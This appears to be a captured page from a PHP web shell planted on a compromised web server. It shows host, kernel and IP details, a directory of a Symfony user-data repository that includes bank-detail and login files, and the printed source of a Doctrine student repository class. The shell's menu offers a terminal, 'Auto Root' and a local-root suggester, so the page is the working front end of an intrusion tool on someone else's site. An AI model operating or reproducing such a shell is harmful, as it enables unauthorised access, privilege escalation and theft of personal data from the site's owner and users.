Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
src /
UserBundle /
Repository /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
CCEStudentRepository.php
2.4
KB
-rwxrwxr-x
2026-05-26 09:32
UserBankDetailRepository.php
256
B
-rwxrwxr-x
2026-04-02 12:06
UserContactRepository.php
1.26
KB
-rwxrwxr-x
2026-04-02 12:06
UserFieldRepository.php
2.7
KB
-rwxrwxr-x
2026-04-02 12:06
UserFieldUserRepository.php
254
B
-rwxrwxr-x
2026-04-02 12:06
UserGroupRepository.php
3.57
KB
-rwxrwxr-x
2026-04-02 12:06
UserLevelRepository.php
1.44
KB
-rwxrwxr-x
2026-04-02 12:06
UserListRepository.php
13.17
KB
-rwxrwxr-x
2026-04-02 12:06
UserLoginRepository.php
442
B
-rwxrwxr-x
2026-05-20 09:05
UserNetworkRepository.php
250
B
-rwxrwxr-x
2026-04-02 12:06
UserOldRepository.php
1.57
KB
-rwxrwxr-x
2026-05-18 12:51
UserTypesRepository.php
267
B
-rwxrwxr-x
2026-04-02 12:06
php_errors.log
3.6
KB
-rwxrwxr-x
2026-04-02 12:06
Save
Rename
<?php namespace App\UserBundle\Repository; use App\UserBundle\Entity\CCEStudent; use App\UserBundle\Util\CCEStudentDisplayOrder; use Doctrine\Bundle\DoctrineBundle\Repository\ServiceEntityRepository; use Doctrine\Persistence\ManagerRegistry; /** * @extends ServiceEntityRepository<CCEStudent> * * @method CCEStudent|null find($id, $lockMode = null, $lockVersion = null) * @method CCEStudent|null findOneBy(array $criteria, array $orderBy = null) * @method CCEStudent[] findAll() * @method CCEStudent[] findBy(array $criteria, array $orderBy = null, $limit = null, $offset = null) */ class CCEStudentRepository extends ServiceEntityRepository { public function __construct(ManagerRegistry $registry) { parent::__construct($registry, CCEStudent::class); } /** * @param array<string, mixed> $criteria * @return CCEStudent[] */ public function findByOrdered(array $criteria, ?int $limit = null, ?int $offset = null): array { $qb = $this->createQueryBuilder('s'); foreach ($criteria as $field => $value) { $qb->andWhere('s.' . $field . ' = :' . $field)->setParameter($field, $value); } CCEStudentDisplayOrder::applyToQueryBuilder($qb, 's'); if ($limit !== null) { $qb->setMaxResults($limit); } if ($offset !== null) { $qb->setFirstResult($offset); } return $qb->getQuery()->getResult(); } /** * @return CCEStudent[] */ public function findAllOrdered(): array { $qb = $this->createQueryBuilder('s'); CCEStudentDisplayOrder::applyToQueryBuilder($qb, 's'); return $qb->getQuery()->getResult(); } // /** // * @return CCEStudent[] Returns an array of CCEStudent objects // */ // public function findByExampleField($value): array // { // return $this->createQueryBuilder('c') // ->andWhere('c.exampleField = :val') // ->setParameter('val', $value) // ->orderBy('c.id', 'ASC') // ->setMaxResults(10) // ->getQuery() // ->getResult() // ; // } // public function findOneBySomeField($value): ?CCEStudent // { // return $this->createQueryBuilder('c') // ->andWhere('c.exampleField = :val') // ->setParameter('val', $value) // ->getQuery() // ->getOneOrNullResult() // ; // } }